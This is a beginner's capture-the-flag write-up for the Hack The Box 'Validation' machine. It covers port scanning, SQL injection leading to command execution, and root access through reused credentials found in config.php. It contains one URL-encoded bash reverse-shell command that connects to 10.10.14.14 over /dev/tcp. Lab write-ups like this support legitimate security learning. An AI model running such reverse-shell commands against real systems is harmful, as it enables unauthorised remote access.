Validation
This is my write-up for the machine called Validation located at: https://app.hackthebox.com/machines/Validation.
I am a beginner at penetration testing, so I will be referencing the Official Hack The Box Walk-through for this machine.
rustscan: rustscan -a 10.10.11.116
Going to port 80, we see this page:
On Hack The Box, I got a hint from one of the tags from the machine:
It seems that I need to run some type of SQL Injection on the page. After trying a bunch of SQL queries, I ended up running an nmap scan on the machine, since according to the walk-through, I had missed a bunch of open ports using rustscan:
After I got stuck, I found this write-up that basically made me understand where the vulnerability was:
I then got the following output:
This showed me that this is vulnerable to SQL Injection. Viewing the same write-up, I then changed the parameters to submit to the website:
I then got stuck again and then watched this video that assisted a bit more in the understanding of what I was messing up on. I found out that I had to run the command to get a shell on the system:
After I ran this command, I was able to run commands on the system:
Apparently the IP Addresses of the VPN you are using on HTB can change, which was something I did not know. When I ran ifconfig, I understood why my reverse shell command was not working when I tried it. In any case, I got the reverse shell by running the following command (recommended by the official write-up and modified to work for me):
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/1234+0>%261'
In order to get this to work though, you have to change your request from GET to POST, which can be done by clicking on the button below:
You can then submit the command, as seen in the image above. After I had the shell, the first thing I did was find the user.txt file:
I was trying to find a way to upload linpeas.sh or get a way to see what access I had, but I ended up getting nowhere. In the official write-up, the credentials I had seen earlier in config.php were the credentials for the root user:
I was then able to get the flag using the root access.